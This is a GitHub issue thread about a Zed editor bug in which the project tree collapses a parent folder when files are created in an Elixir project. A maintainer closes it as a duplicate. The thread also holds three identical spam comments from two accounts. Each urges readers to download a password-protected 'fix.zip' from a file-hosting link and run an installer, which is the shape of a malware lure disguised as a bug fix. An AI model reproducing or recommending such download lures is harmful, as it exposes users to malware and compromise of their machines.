### ISSUE TITLE
Zed with ElixirLS on elixir project the project tree fold parent folder when creating/deleting file/folder

### ISSUE THREAD

**Issue by mmittnacht** [zed-industries/zed#16870] opened 2024-08-26 12:21 UTC
### Check for existing issues

- [X] Completed

### Describe the bug / provide steps to reproduce it

With ElixirLS in an elixir project when I create a file/folder, the parent folder closes. The file creation is successfully happened and the file is is opened.

### Environment

Zed: v0.151.0 (Zed Dev 55dda0e6afee4e968aa3f90d9c157825036a2c98)
OS: Windows 10.0.22631
Memory: 15.9 GiB
Architecture: x86_64
GPU: NVIDIA GeForce GTX 1060 3GB || NVIDIA || 555.99

**Comment by Searchanik** [comment] 2024-08-26 12:21
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment] 2024-08-26 12:31
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment] 2024-08-26 12:34
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by notpeter** [comment] 2024-09-01 19:09
I believe this is a duplicate of:
- https://github.com/zed-industries/zed/issues/13762

If you rebuild from main you should pickup the fix.

**Closed by notpeter** 2024-09-01 19:09 UTC
Labels: defect, triage, admin read
